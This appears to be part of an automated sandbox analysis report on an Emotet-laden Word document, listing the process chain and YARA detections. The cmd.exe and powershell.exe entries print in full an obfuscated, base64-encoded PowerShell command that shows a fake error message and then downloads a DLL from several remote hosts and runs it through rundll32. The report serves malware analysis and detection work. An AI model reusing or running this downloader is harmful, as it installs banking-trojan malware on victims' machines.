02 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e0 03 00 00 00 a0 05 00 00 04 00 00 00 38 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 3d0bMZ@!L!This program cannot be run in DOS mode.$PELF`!2@PP`d<Xa`.text68 `.rdataWP<@@.data`>@.text4pB@.text8d`0 @.text7dp2 @.text6d4 @.text5d6 @.reloc8@B


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:22:56:32
                                              Start date:17/02/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f940000
                                              File size:1424032 bytes
                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:22:56:34
                                              Start date:17/02/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA
                                              Imagebase:0x4a770000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:22:56:35
                                              Start date:17/02/2021
                                              Path:C:\Windows\System32\msg.exe
                                              Wow64 process (32bit):false
                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                              Imagebase:0xff770000
                                              File size:26112 bytes
                                              MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:22:56:35
                                              Start date:17/02/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA
                                              Imagebase:0x13f070000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              General

                                              Start time:22:56:45
                                              Start date:17/02/2021
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                                              Imagebase:0xff830000
                                              File size:45568 bytes
                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:22:56:45
                                              Start date:17/02/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                                              Imagebase:0xa10000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              General

                                              Start time:22:56:51
                                              Start date:17/02/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
                                              Imagebase:0xa10000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              General

                                              Start time:22:56:56
                                              Start date:17/02/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
                                              Imagebase:0xa10000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              General

                                              Start time:22:57:01
                                              Start date:17/02/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
                                              Imagebase:0xa10000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              General

                                              Start time:22:57:07
                                              Start date:17/02/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
                                              Imagebase:0xa10000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              General

                                              Start time:22:57:12
                                              Start date:17/02/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
                                              Imagebase:0xa10000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
